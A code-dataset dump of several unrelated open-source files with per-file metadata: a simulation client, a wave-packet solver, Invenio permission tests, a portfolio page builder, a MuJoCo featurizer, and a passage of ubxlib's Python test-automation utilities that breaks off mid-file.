if sim_state is SimStateResponse.SimState.RUNNING:
print(vid + ": Request data")
request = DataRequest()
request.request_ids.extend(requests)
data = service.request_data(sid, vid_obj, request) # request()
print(data)
print(vid + ": Wait for control")
control = Control()
control.avCommand.accelerate = 1
service.control(sid, vid_obj, control)
else:
print(sid.sid + ": The simulation is not running anymore (State: "
+ SimStateResponse.SimState.Name(sim_state) + ").")
print(sid.sid + ": Final result: " + service.get_result(sid))
break
sim_state = service.wait_for_simulator_request(sid, vid_obj) # wait()
if sim_state is sim_state is SimStateResponse.SimState.RUNNING:
result = TestResult()
result.result = TestResult.Result.FAILED
service.control_sim(sid, result)
if __name__ == "__main__":
from AIExchangeService import get_service
from aiExchangeMessages_pb2 import SimStateResponse, Control, SimulationID, VehicleID, DataRequest
service = get_service()
# Send tests
sids = service.run_tests("test", "test", "xmls/criteriaA.dbc.xml", "xmls/environmentA.dbe.xml")
# -> Response status: 500
print("Tests sent")
# Interact with a simulation
if not sids:
exit(1)
sid = SimulationID()
sid.sid = sids.sids[0]
ego_requests = ["egoSpeed"]
ego_vehicle = Thread(target=_handle_vehicle, args=(sid, "ego", ego_requests))
ego_vehicle.start()
ego_vehicle.join()
| 33.555556
| 102
| 0.638127
| 247
| 2,114
| 5.279352
| 0.340081
| 0.027607
| 0.027607
| 0.047546
| 0.15184
| 0.15184
| 0.096626
| 0.096626
| 0.096626
| 0.096626
| 0
| 0.006993
| 0.255913
| 2,114
| 62
| 103
| 34.096774
| 0.821996
| 0.040208
| 0
| 0.042553
| 0
| 0
| 0.100396
| 0.023244
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021277
| false
| 0
| 0.12766
| 0
| 0.148936
| 0.170213
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
dddd2ef86d68662ac04401af3b7b61b4ab5cb9ed
| 1,916
|
py
|
Python
|
rfap.py
|
anabanami/RFAP
|
09b434d115ae1872810d65126bcbc9d7af510e89
|
[
"MIT"
] | null | null | null |
rfap.py
|
anabanami/RFAP
|
09b434d115ae1872810d65126bcbc9d7af510e89
|
[
"MIT"
] | null | null | null |
rfap.py
|
anabanami/RFAP
|
09b434d115ae1872810d65126bcbc9d7af510e89
|
[
"MIT"
] | null | null | null |
# PHS3350
# Week 2 - wave packet and RFAP -
# "what I cannot create I cannot understand" - R. Feynman.
# Ana Fabela Hinojosa, 13/03/2021
import os
from pathlib import Path
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import physunits
from scipy.fft import fft, ifft
plt.rcParams['figure.dpi'] = 200
folder = Path('wavepacket_time_evolution')
os.makedirs(folder, exist_ok=True)
os.system(f'rm {folder}/*.png')
# hbar = 1.0545718e-34 # [Js]
hbar = 1
m = 1
𝜎 = 1
x_max = 10
x = np.linspace(-x_max, x_max, 1024, endpoint=False)
n = x.size
x_step = x[1] - x[0]
# oscillations per unit of space
k0 = 2 * np.pi / x_max * 5
# For Fourier space
k = 2 * np.pi * np.fft.fftfreq(n, x_step)
wave = np.exp(- x**2 / (2*𝜎**2)) * np.exp(1j*k0*x)
# Square well potential
sw = np.zeros_like(x)
# depth
sw[0] = sw[-1] = 1000*k0**2
# Schrodinger equation (or first order time derivarive)
def Schrodinger_eqn(t, Ψ):
r = np.linspace(0, x_max, 1024, endpoint=False)
KΨ = -hbar**2/(2 * m) * ifft(-(k**2) * fft(Ψ))
VΨ = sw * Ψ
# I dunno #+ (-1j / hbar) * 1j*x**3 * Ψ
return (-1j / hbar) * (KΨ + VΨ)
def Runge_Kutta(t, delta_t, Ψ):
k1 = Schrodinger_eqn(t, Ψ)
k2 = Schrodinger_eqn(t + delta_t / 2, Ψ + k1 * delta_t / 2)
k3 = Schrodinger_eqn(t + delta_t / 2, Ψ + k2 * delta_t / 2)
k4 = Schrodinger_eqn(t + delta_t, Ψ + k3 * delta_t)
return Ψ + (delta_t / 6) * (k1 + 2 * k2 + 2 * k3 + k4)
i = 0
t = 0
t_final = 5
delta_t = 0.0001
while t < t_final:
if not i % 400:
plt.plot(x, np.real(wave), label="real part")
plt.plot(x, np.imag(wave), label="imaginary part")
plt.xlim(-x_max, x_max)
plt.legend()
plt.xlabel("x")
plt.title(f"wave packet t = {i}")
plt.savefig(folder/f'{i:04d}.png')
# plt.show()
plt.clf()
wave = Runge_Kutta(t, delta_t, wave)
i += 1
t += delta_t
| 23.95
| 64
| 0.598643
| 338
| 1,916
| 3.295858
| 0.39645
| 0.059246
| 0.037702
| 0.05386
| 0.128366
| 0.041293
| 0.041293
| 0
| 0
| 0
| 0
| 0.067586
| 0.243215
| 1,916
| 79
| 65
| 24.253165
| 0.70069
| 0.174843
| 0
| 0
| 0
| 0
| 0.067732
| 0.015974
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039216
| false
| 0
| 0.137255
| 0
| 0.215686
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
dde27c4c382b986590140f153b007830bdfd2e36
| 3,725
|
py
|
Python
|
tests/api/test_record_permissions.py
|
equadon/invenio-app-ils
|
42ba282968d0aa28fb1bfc71d0709685165aaec4
|
[
"MIT"
] | null | null | null |
tests/api/test_record_permissions.py
|
equadon/invenio-app-ils
|
42ba282968d0aa28fb1bfc71d0709685165aaec4
|
[
"MIT"
] | null | null | null |
tests/api/test_record_permissions.py
|
equadon/invenio-app-ils
|
42ba282968d0aa28fb1bfc71d0709685165aaec4
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2018-2019 CERN.
#
# invenio-app-ils is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Test record permissions."""
from __future__ import unicode_literals
import uuid
import pytest
from flask_principal import RoleNeed, identity_loaded
from flask_security import login_user
from invenio_access.models import ActionRoles
from invenio_accounts.models import Role, User
from invenio_records.api import Record
from invenio_app_ils.records.permissions import RecordPermission, \
create_records_action
@pytest.mark.parametrize(
"access,action,is_allowed",
[
({"foo": "bar"}, "read", True),
({"foo": "bar"}, "update", False),
({"_access": {"read": [1]}}, "read", True),
({"_access": {"read": [2]}}, "read", False),
({"_access": {"read": ["records-readers"]}}, "read", True),
# permission for specific user to create
({"_access": {"update": [1]}}, "update", True),
# checks if the access works for different actions
({"_access": {"update": [1]}}, "create", False),
({"_access": {"delete": [1]}}, "update", False),
# delete access for user and librarian
({"_access": {"delete": [1, "librarian"]}}, "delete", True),
],
)
def test_record_generic_access(db, users, with_access, access, action,
is_allowed):
"""Test access control for records."""
@identity_loaded.connect
def mock_identity_provides(sender, identity):
"""Provide additional role to the user."""
roles = [RoleNeed("records-readers")]
# Gives the user additional roles, f.e. based on his groups
identity.provides |= set(roles)
def login_and_test(user_id):
login_user(User.query.get(user_id))
# Create record
user = User.query.get(user_id)
id = uuid.uuid4()
record = Record.create(access, id_=id)
factory = RecordPermission(record, action)
if user.has_role("admin"):
# super user can do EVERYTHING
assert factory.can()
elif user.has_role("librarian") and action != "delete":
# librarian should be able to update, create, and read everything
assert factory.can()
else:
assert factory.can() if is_allowed else not factory.can()
# Test standard user
login_and_test(users["patron1"].id)
# Test librarian access
login_and_test(users["librarian"].id)
# Test superuser access
login_and_test(users["admin"].id)
@pytest.mark.parametrize(
"access,action,is_allowed",
[
({"foo": "bar"}, "create", True),
({"foo": "bar"}, "update", False),
({"foo": "bar"}, "delete", False),
],
)
def test_record_patron_create(db, users, access, action, is_allowed):
"""Test patron create."""
# create role to be able to create records
role = Role(name="records-creators")
db.session.add(role)
db.session.commit()
# assign role to the action "create-records"
ar = ActionRoles.allow(create_records_action, role_id=role.id)
db.session.add(ar)
db.session.commit()
@identity_loaded.connect
def mock_identity_provides(sender, identity):
"""Provide additional role to the user."""
roles = [RoleNeed(role.name)]
# Gives the user additional roles, f.e. based on his groups
identity.provides |= set(roles)
login_user(users["patron1"])
id = uuid.uuid4()
record = Record.create(access, id_=id)
factory = RecordPermission(record, action)
assert factory.can() if is_allowed else not factory.can()
| 33.863636
| 77
| 0.633289
| 458
| 3,725
| 5.015284
| 0.28821
| 0.023509
| 0.02438
| 0.036569
| 0.371789
| 0.311711
| 0.292556
| 0.292556
| 0.292556
| 0.250762
| 0
| 0.006618
| 0.229262
| 3,725
| 109
| 78
| 34.174312
| 0.793452
| 0.226846
| 0
| 0.376812
| 0
| 0
| 0.116361
| 0.016925
| 0
| 0
| 0
| 0
| 0.057971
| 1
| 0.072464
| false
| 0
| 0.130435
| 0
| 0.202899
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
dde28d401374fdc16a1d1b838ec6fd235235e1cc
| 945
|
py
|
Python
|
src/Index.py
|
bhed01/bhed01.github.io
|
132cf8e4afa05a00d71555afa2002a2d50c304c8
|
[
"MIT"
] | 3
|
2020-10-16T12:26:31.000Z
|
2022-02-03T18:06:35.000Z
|
src/Index.py
|
bhed01/bhed01.github.io
|
132cf8e4afa05a00d71555afa2002a2d50c304c8
|
[
"MIT"
] | null | null | null |
src/Index.py
|
bhed01/bhed01.github.io
|
132cf8e4afa05a00d71555afa2002a2d50c304c8
|
[
"MIT"
] | null | null | null |
from .components.Head import Head
from .components.NavIcons import Hamburger
from .components.Screens import HomeScreen, AboutScreen, ProjectsScreen
from .components.Footer import Footer
from .utils import JSON_DIR
from json import load
import os
def Index():
with open(os.path.join(JSON_DIR, 'home_data.json')) as hFile:
home_data = load(hFile)
with open(os.path.join(JSON_DIR, 'about_data.json')) as aFile:
about_data = load(aFile)
with open(os.path.join(JSON_DIR, 'projects_data.json')) as pFile:
projects = load(pFile)['projects']
with open(os.path.join(JSON_DIR, 'footer_data.json')) as fFile:
footer_data = load(fFile)
return Head(
title='Portfolio - Bhed',
children=f'''
{Hamburger()}
{HomeScreen(**home_data)}
{AboutScreen(**about_data)}
{ProjectsScreen(projects)}
{Footer(**footer_data)}'''
)
| 32.586207
| 72
| 0.649735
| 118
| 945
| 5.076271
| 0.313559
| 0.058431
| 0.066778
| 0.093489
| 0.166945
| 0.166945
| 0.166945
| 0
| 0
| 0
| 0
| 0
| 0.22963
| 945
| 28
| 73
| 33.75
| 0.822802
| 0
| 0
| 0
| 0
| 0
| 0.268266
| 0.110142
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04
| false
| 0
| 0.28
| 0
| 0.36
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
dde2faa4056b42852281bc2be32673929adfef2b
| 5,190
|
py
|
Python
|
bisk/features/base.py
|
facebookresearch/bipedal-skills
|
edd424a8779e3a0121fb995cad00839d8226cf46
|
[
"MIT"
] | 6
|
2021-11-05T16:57:58.000Z
|
2022-03-16T10:34:46.000Z
|
bisk/features/base.py
|
facebookresearch/bipedal-skills
|
edd424a8779e3a0121fb995cad00839d8226cf46
|
[
"MIT"
] | null | null | null |
bisk/features/base.py
|
facebookresearch/bipedal-skills
|
edd424a8779e3a0121fb995cad00839d8226cf46
|
[
"MIT"
] | 1
|
2021-11-05T16:57:47.000Z
|
2021-11-05T16:57:47.000Z
|
# Copyright (c) 2021-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
import logging
from typing import Dict, List
import gym
import numpy as np
from dm_control import mujoco
from dm_control.mujoco.wrapper.mjbindings import enums as mjenums
from dm_control.mujoco.wrapper.mjbindings import mjlib
log = logging.getLogger(__name__)
class Featurizer:
n_qpos: Dict[int, int] = { # qpos entries per joint type
mjenums.mjtJoint.mjJNT_FREE: 7,
mjenums.mjtJoint.mjJNT_BALL: 4,
mjenums.mjtJoint.mjJNT_SLIDE: 1,
mjenums.mjtJoint.mjJNT_HINGE: 1,
}
n_qvel: Dict[int, int] = { # qvel entries per joint type
mjenums.mjtJoint.mjJNT_FREE: 6,
mjenums.mjtJoint.mjJNT_BALL: 3,
mjenums.mjtJoint.mjJNT_SLIDE: 1,
mjenums.mjtJoint.mjJNT_HINGE: 1,
}
def __init__(
self,
p: mujoco.Physics,
robot: str,
prefix: str = 'robot',
exclude: str = None,
):
self.p = p
self.prefix = prefix
self.observation_space: gym.spaces.Box = None
def __call__(self) -> np.ndarray:
raise NotImplementedError()
def set_frame_of_reference(self):
raise NotImplementedError()
def feature_names(self) -> List[str]:
raise NotImplementedError()
def qpos_names(self) -> List[str]:
names = ['' for i in range(len(self.p.data.qpos))]
for jn in self.p.named.model.jnt_type.axes.row.names:
typ = self.p.named.model.jnt_type[jn]
adr = self.p.named.model.jnt_qposadr[jn]
if typ == 0:
names[adr + 0] = f'{jn}:px'
names[adr + 1] = f'{jn}:py'
names[adr + 2] = f'{jn}:pz'
names[adr + 3] = f'{jn}:ow'
names[adr + 4] = f'{jn}:ox'
names[adr + 5] = f'{jn}:oy'
names[adr + 6] = f'{jn}:oz'
elif typ == 1:
names[adr + 0] = f'{jn}:ow'
names[adr + 1] = f'{jn}:ox'
names[adr + 2] = f'{jn}:oy'
names[adr + 3] = f'{jn}:oz'
elif typ == 2 or typ == 3:
names[adr] = f'{jn}:p'
else:
raise ValueError(f'Unknown joint type {typ}')
return names
def qvel_names(self) -> List[str]:
names = ['' for i in range(len(self.p.data.qvel))]
for jn in self.p.named.model.jnt_type.axes.row.names:
typ = self.p.named.model.jnt_type[jn]
adr = self.p.named.model.jnt_dofadr[jn]
if typ == 0:
names[adr + 0] = f'{jn}:lvx'
names[adr + 1] = f'{jn}:lvy'
names[adr + 2] = f'{jn}:lvz'
names[adr + 3] = f'{jn}:avx'
names[adr + 4] = f'{jn}:avy'
names[adr + 5] = f'{jn}:avz'
elif typ == 1:
names[adr + 0] = f'{jn}:avx'
names[adr + 1] = f'{jn}:avy'
names[adr + 2] = f'{jn}:avz'
elif typ == 2 or typ == 3:
names[adr] = f'{jn}:v'
else:
raise ValueError(f'Unknown joint type {typ}')
return names
def cfrc_ext_names(self) -> List[List[str]]:
names: List[List[str]] = []
for cn in self.p.named.data.cfrc_ext.axes.row.names:
names.append(
[f'{cn}:c{n}' for n in ['rx', 'ry', 'rz', 'tx', 'ty', 'tz']]
)
return names
def sensor_names(self) -> List[str]:
names = ['' for i in range(len(self.p.data.sensordata))]
for sn in self.p.named.model.sensor_adr.axes.row.names:
typ = self.p.named.model.sensor_type[sn]
adr = self.p.named.model.sensor_adr[sn]
if typ == mjenums.mjtSensor.mjSENS_GYRO:
feats = ['avx', 'avy', 'avz']
elif (
typ == mjenums.mjtSensor.mjSENS_VELOCIMETER
or typ == mjenums.mjtSensor.mjSENS_SUBTREELINVEL
):
feats = ['lvx', 'lvy', 'lvz']
elif typ == mjenums.mjtSensor.mjSENS_ACCELEROMETER:
feats = ['lax', 'lay', 'laz']
elif (
typ == mjenums.mjtSensor.mjSENS_FRAMEPOS
or typ == mjenums.mjtSensor.mjSENS_SUBTREECOM
):
feats = ['px', 'py', 'pz']
elif typ == mjenums.mjtSensor.mjSENS_JOINTPOS:
feats = ['']
elif typ == mjenums.mjtSensor.mjSENS_JOINTVEL:
feats = ['']
elif typ == mjenums.mjtSensor.mjSENS_FORCE:
feats = ['fx', 'fy', 'fz']
elif typ == mjenums.mjtSensor.mjSENS_TORQUE:
feats = ['tx', 'ty', 'tz']
elif typ == mjenums.mjtSensor.mjSENS_RANGEFINDER:
feats = ['d']
elif typ == mjenums.mjtSensor.mjSENS_TOUCH:
feats = ['f']
else:
raise ValueError(f'Unsupported sensor type: {typ}')
for i, f in enumerate(feats):
names[adr + i] = f'{sn}:{f}'
return names
| 36.293706
| 76
| 0.511753
| 651
| 5,190
| 3.99232
| 0.25192
| 0.070796
| 0.087726
| 0.115429
| 0.56137
| 0.371681
| 0.327049
| 0.294729
| 0.234706
| 0.219315
| 0
| 0.011912
| 0.352987
| 5,190
| 142
| 77
| 36.549296
| 0.762061
| 0.042004
| 0
| 0.266129
| 0
| 0
| 0.064464
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064516
| false
| 0
| 0.056452
| 0
| 0.177419
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddebffcf3d40adc0208ac8b35c967b6d0551178a
| 38,079
|
py
|
Python
|
port/platform/common/automation/u_utils.py
|
stephanboner/ubxlib
|
64025c5760771ac2accd09f9f176693c7add2919
|
[
"Apache-2.0"
] | null | null | null |
port/platform/common/automation/u_utils.py
|
stephanboner/ubxlib
|
64025c5760771ac2accd09f9f176693c7add2919
|
[
"Apache-2.0"
] | null | null | null |
port/platform/common/automation/u_utils.py
|
stephanboner/ubxlib
|
64025c5760771ac2accd09f9f176693c7add2919
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
'''Generally useful bits and bobs.'''
import queue # For PrintThread and exe_run
from time import sleep, time, gmtime, strftime # For lock timeout, exe_run timeout and logging
import threading # For PrintThread
import os # For ChangeDir, has_admin
import stat # To help deltree out
from telnetlib import Telnet # For talking to JLink server
import socket
import shutil # To delete a directory tree
import signal # For CTRL_C_EVENT
import subprocess
import platform # Figure out current OS
import serial # Pyserial (make sure to do pip install pyserial)
import psutil # For killing things (make sure to do pip install psutil)
import u_settings
# How long to wait for an install lock in seconds
INSTALL_LOCK_WAIT_SECONDS = u_settings.INSTALL_LOCK_WAIT_SECONDS #(60 * 60)
# The URL for Unity, the unit test framework
UNITY_URL = u_settings.UNITY_URL #"https://github.com/ThrowTheSwitch/Unity"
# The sub-directory that Unity is usually put in
# (off the working directory)
UNITY_SUBDIR = u_settings.UNITY_SUBDIR #"Unity"
# The path to DevCon, a Windows tool that allows
# USB devices to be reset, amongst other things
DEVCON_PATH = u_settings.DEVCON_PATH #"devcon.exe"
# The path to jlink.exe (or just the name 'cos it's on the path)
JLINK_PATH = u_settings.JLINK_PATH #"jlink.exe"
# The port number for SWO trace capture out of JLink
JLINK_SWO_PORT = u_settings.JLINK_SWO_PORT #19021
# The port number for GDB control of ST-LINK GDB server
STLINK_GDB_PORT = u_settings.STLINK_GDB_PORT #61200
# The port number for SWO trace capture out of ST-LINK GDB server
STLINK_SWO_PORT = u_settings.STLINK_SWO_PORT #61300
# The format string passed to strftime()
# for logging prints
TIME_FORMAT = u_settings.TIME_FORMAT #"%Y-%m-%d_%H:%M:%S"
# The default guard time waiting for a platform lock in seconds
PLATFORM_LOCK_GUARD_TIME_SECONDS = u_settings.PLATFORM_LOCK_GUARD_TIME_SECONDS #60 * 60
# The default guard time for downloading to a target in seconds
DOWNLOAD_GUARD_TIME_SECONDS = u_settings.DOWNLOAD_GUARD_TIME_SECONDS #60
# The default guard time for running tests in seconds
RUN_GUARD_TIME_SECONDS = u_settings.RUN_GUARD_TIME_SECONDS #60 * 60
# The default inactivity timer for running tests in seconds
RUN_INACTIVITY_TIME_SECONDS = u_settings.RUN_INACTIVITY_TIME_SECONDS #60 * 5
# The name of the #define that forms the filter string
# for which tests to run
FILTER_MACRO_NAME = u_settings.FILTER_MACRO_NAME #"U_CFG_APP_FILTER"
# The time for which to wait for something from the
# queue in exe_run(). If this is too short, in a
# multiprocessing world or on a slow machine, it is
# possible to miss things as the task putting things
# on the queue may be blocked from doing so until
# we've decided the queue has been completely emptied
# and moved on
EXE_RUN_QUEUE_WAIT_SECONDS = u_settings.EXE_RUN_QUEUE_WAIT_SECONDS #1
def subprocess_osify(cmd):
''' expects an array of strings being [command, param, ...] '''
if platform.system() == "Linux":
return [ ' '.join(cmd) ]
return cmd
def get_actual_path(path):
'''Given a drive number return real path if it is a subst'''
actual_path = path
# Get a list of substs
text = subprocess.check_output("subst",
stderr=subprocess.STDOUT,
shell=True) # Jenkins hangs without this
for line in text.splitlines():
# Lines should look like this:
# Z:\: => C:\projects\ubxlib_priv
# So, in this example, if we were given z:\blah
# then the actual path should be C:\projects\ubxlib_priv\blah
text = line.decode()
bits = text.rsplit(": => ")
if (len(bits) > 1) and (len(path) > 1) and \
(bits[0].lower()[0:2] == path[0:2].lower()):
actual_path = bits[1] + path[2:]
break
return actual_path
def get_instance_text(instance):
'''Return the instance as a text string'''
instance_text = ""
for idx, item in enumerate(instance):
if idx == 0:
instance_text += str(item)
else:
instance_text += "." + str(item)
return instance_text
def remove_readonly(func, path, exec_info):
'''Help deltree out'''
del exec_info
os.chmod(path, stat.S_IWRITE)
func(path)
def deltree(directory, printer, prompt):
'''Remove an entire directory tree'''
tries = 2
success = False
if os.path.isdir(directory):
# Retry this as sometimes Windows complains
# that the directory is not empty when it
# it really should be, some sort of internal
# Windows race condition
while not success and (tries > 0):
try:
# Need the onerror bit on Winders, seek
# this Stack Overflow post:
# https://stackoverflow.com/questions/1889597/deleting-directory-in-python
shutil.rmtree(directory, onerror=remove_readonly)
success = True
except OSError as ex:
printer.string("{}ERROR unable to delete \"{}\" {}: \"{}\"".
format(prompt, directory,
ex.errno, ex.strerror))
tries -= 1
else:
success = True
return success
# Check if admin privileges are available, from:
# https://stackoverflow.com/questions/2946746/python-checking-if-a-user-has-administrator-privileges
def has_admin():
'''Check for administrator privileges'''
admin = False
if os.name == 'nt':
try:
# only Windows users with admin privileges can read the C:\windows\temp
if os.listdir(os.sep.join([os.environ.get("SystemRoot", "C:\\windows"), "temp"])):
admin = True
except PermissionError:
pass
else:
# Pylint will complain about the following line but
# that's OK, it is only executed if we're NOT on Windows
# and there the geteuid() method will exist
if "SUDO_USER" in os.environ and os.geteuid() == 0:
admin = True
return admin
# Reset a USB port with the given Device Description
def usb_reset(device_description, printer, prompt):
''' Reset a device'''
instance_id = None
found = False
success = False
try:
# Run devcon and parse the output to find the given device
printer.string("{}running {} to look for \"{}\"...". \
format(prompt, DEVCON_PATH, device_description))
cmd = [DEVCON_PATH, "hwids", "=ports"]
text = subprocess.check_output(subprocess_osify(cmd),
stderr=subprocess.STDOUT,
shell=True) # Jenkins hangs without this
for line in text.splitlines():
# The format of a devcon entry is this:
#
# USB\VID_1366&PID_1015&MI_00\6&38E81674&0&0000
# Name: JLink CDC UART Port (COM45)
# Hardware IDs:
# USB\VID_1366&PID_1015&REV_0100&MI_00
# USB\VID_1366&PID_1015&MI_00
# Compatible IDs:
# USB\Class_02&SubClass_02&Prot_00
# USB\Class_02&SubClass_02
# USB\Class_02
#
# Grab what we hope is the instance ID
line = line.decode()
if line.startswith("USB"):
instance_id = line
else:
# If the next line is the Name we want then we're done
if instance_id and ("Name: " + device_description in line):
found = True
printer.string("{}\"{}\" found with instance ID \"{}\"". \
format(prompt, device_description,
instance_id))
break
instance_id = None
if found:
# Now run devcon to reset the device
printer.string("{}running {} to reset device \"{}\"...". \
format(prompt, DEVCON_PATH, instance_id))
cmd = [DEVCON_PATH, "restart", "@" + instance_id]
text = subprocess.check_output(subprocess_osify(cmd),
stderr=subprocess.STDOUT,
shell=False) # Has to be False or devcon won't work
for line in text.splitlines():
printer.string("{}{}".format(prompt, line.decode()))
success = True
else:
printer.string("{}device with description \"{}\" not found.". \
format(prompt, device_description))
except subprocess.CalledProcessError:
printer.string("{} unable to find and reset device.".format(prompt))
return success
# Open the required serial port.
def open_serial(serial_name, speed, printer, prompt):
'''Open serial port'''
serial_handle = None
text = "{}: trying to open \"{}\" as a serial port...". \
format(prompt, serial_name)
try:
return_value = serial.Serial(serial_name, speed, timeout=0.05)
serial_handle = return_value
printer.string("{} opened.".format(text))
except (ValueError, serial.SerialException) as ex:
printer.string("{}{} while accessing port {}: {}.".
format(prompt, type(ex).__name__,
serial_handle.name, str(ex)))
return serial_handle
def open_telnet(port_number, printer, prompt):
'''Open telnet port on localhost'''
telnet_handle = None
text = "{}trying to open \"{}\" as a telnet port on localhost...". \
format(prompt, port_number)
try:
telnet_handle = Telnet("localhost", int(port_number), timeout=5)
if telnet_handle is not None:
printer.string("{} opened.".format(text))
else:
printer.string("{} failed.".format(text))
except (socket.error, socket.timeout, ValueError) as ex:
printer.string("{}{} failed to open telnet {}: {}.".
format(prompt, type(ex).__name__,
port_number, str(ex)))
return telnet_handle
def install_lock_acquire(install_lock, printer, prompt):
'''Attempt to acquire install lock'''
timeout_seconds = INSTALL_LOCK_WAIT_SECONDS
success = False
if install_lock:
printer.string("{}waiting for install lock...".format(prompt))
while not install_lock.acquire(False) and (timeout_seconds > 0):
sleep(1)
timeout_seconds -= 1
if timeout_seconds > 0:
printer.string("{}got install lock.".format(prompt))
success = True
else:
printer.string("{}failed to aquire install lock.".format(prompt))
else:
printer.string("{}warning, there is no install lock.".format(prompt))
return success
def install_lock_release(install_lock, printer, prompt):
'''Release install lock'''
if install_lock:
install_lock.release()
printer.string("{}install lock released.".format(prompt))
def fetch_repo(url, directory, branch, printer, prompt):
'''Fetch a repo: directory can be relative or absolute'''
got_code = False
checked_out = False
success = False
printer.string("{}in directory {}, fetching"
" {} to directory {}".format(prompt, os.getcwd(),
url, directory))
if not branch:
branch = "master"
if os.path.isdir(directory):
# Update existing code
with ChangeDir(directory):
printer.string("{}updating code in {}...".
format(prompt, directory))
try:
text = subprocess.check_output(subprocess_osify(["git", "pull",
"origin", branch]),
stderr=subprocess.STDOUT,
shell=True) # Jenkins hangs without this
for line in text.splitlines():
printer.string("{}{}".format(prompt, line.decode()))
got_code = True
except subprocess.CalledProcessError as error:
printer.string("{}git returned error {}: \"{}\"".
format(prompt, error.returncode,
error.output))
else:
# Clone the repo
printer.string("{}cloning from {} into {}...".
format(prompt, url, directory))
try:
text = subprocess.check_output(subprocess_osify(["git", "clone", url, directory]),
stderr=subprocess.STDOUT,
shell=True) # Jenkins hangs without this
for line in text.splitlines():
printer.string("{}{}".format(prompt, line.decode()))
got_code = True
except subprocess.CalledProcessError as error:
printer.string("{}git returned error {}: \"{}\"".
format(prompt, error.returncode,
error.output))
if got_code and os.path.isdir(directory):
# Check out the correct branch and recurse submodules
with ChangeDir(directory):
printer.string("{}checking out branch {}...".
format(prompt, branch))
try:
text = subprocess.check_output(subprocess_osify(["git", "-c",
"advice.detachedHead=false",
"checkout",
"origin/" + branch]),
stderr=subprocess.STDOUT,
shell=True) # Jenkins hangs without this
for line in text.splitlines():
printer.string("{}{}".format(prompt, line.decode()))
checked_out = True
except subprocess.CalledProcessError as error:
printer.string("{}git returned error {}: \"{}\"".
format(prompt, error.returncode,
error.output))
if checked_out:
printer.string("{}recursing sub-modules (can take some time" \
" and gives no feedback).".format(prompt))
try:
text = subprocess.check_output(subprocess_osify(["git", "submodule",
"update", "--init",
"--recursive"]),
stderr=subprocess.STDOUT,
shell=True) # Jenkins hangs without this
for line in text.splitlines():
printer.string("{}{}".format(prompt, line.decode()))
success = True
except subprocess.CalledProcessError as error:
printer.string("{}git returned error {}: \"{}\"".
format(prompt, error.returncode,
error.output))
return success
def exe_where(exe_name, help_text, printer, prompt):
'''Find an executable using where.exe or which on linux'''
success = False
try:
printer.string("{}looking for \"{}\"...". \
format(prompt, exe_name))
# See here:
# https://stackoverflow.com/questions/14928860/passing-double-quote-shell-commands-in-python-to-subprocess-popen
# ...for why the construction "".join() is necessary when
# passing things which might have spaces in them.
# It is the only thing that works.
if platform.system() == "Linux":
cmd = ["which {}".format(exe_name)]
printer.string("{}detected linux, calling \"{}\"...".format(prompt, cmd))
else:
cmd = ["where", "".join(exe_name)]
printer.string("{}detected nonlinux, calling \"{}\"...".format(prompt, cmd))
text = subprocess.check_output(cmd,
stderr=subprocess.STDOUT,
shell=True) # Jenkins hangs without this
for line in text.splitlines():
printer.string("{}{} found in {}".format(prompt, exe_name,
line.decode()))
success = True
except subprocess.CalledProcessError:
if help_text:
printer.string("{}ERROR {} not found: {}". \
format(prompt, exe_name, help_text))
else:
printer.string("{}ERROR {} not found". \
format(prompt, exe_name))
return success
def exe_version(exe_name, version_switch, printer, prompt):
'''Print the version of a given executable'''
success = False
if not version_switch:
version_switch = "--version"
try:
text = subprocess.check_output(subprocess_osify(["".join(exe_name), version_switch]),
stderr=subprocess.STDOUT,
shell=True) # Jenkins hangs without this
for line in text.splitlines():
printer.string("{}{}".format(prompt, line.decode()))
success = True
except subprocess.CalledProcessError:
printer.string("{}ERROR {} either not found or didn't like {}". \
format(prompt, exe_name, version_switch))
return success
def exe_terminate(process_pid):
'''Jonathan's killer'''
process = psutil.Process(process_pid)
for proc in process.children(recursive=True):
proc.terminate()
process.terminate()
def read_from_process_and_queue(process, read_queue):
'''Read from a process, non-blocking'''
while process.poll() is None:
string = process.stdout.readline().decode()
if string:
read_queue.put(string)
def queue_get_no_exception(the_queue, block=True, timeout=None):
'''A version of queue.get() that doesn't throw an Empty exception'''
thing = None
try:
thing = the_queue.get(block=block, timeout=timeout)
except queue.Empty:
pass
